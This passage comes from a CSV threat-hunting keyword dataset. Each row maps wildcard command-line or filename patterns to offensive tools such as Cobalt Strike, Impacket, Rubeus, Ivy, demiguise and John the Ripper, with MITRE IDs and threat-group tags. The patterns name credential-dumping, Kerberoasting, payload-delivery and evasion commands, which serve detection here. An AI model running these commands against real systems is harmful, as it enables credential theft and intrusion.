TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -isbeacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --isroca --publickey *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -it bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.c -Ix86 *.c -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -Ix64 *.vba -Ix86 *.vba -P Inject -O *","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"* jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -JMXConsole -AppName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* john_done*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_fork*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_load_conf_db*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_log_format2*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_mpi_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_init*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_maybe_adjust_or_fallback*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_omp_show_info*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_register_one*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_run*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_mpi*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_set_tristates*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* john_wait*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* JspShell ua*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* -just-dc-ntlm *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -k * -c *.exe* -p Outlook.Application -o *.hta*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* -k --kerberoast*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"* -k -request-user * -dc-ip*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* k8gege520 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* kalilinux/kali-rolling*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* kdbof.cpp*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"* keepass /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* kerberoast /spn:*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"* Kerberoastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --kerberoasting *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* kerberos asreproast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos brute * -d *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* kerberos brute *.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in 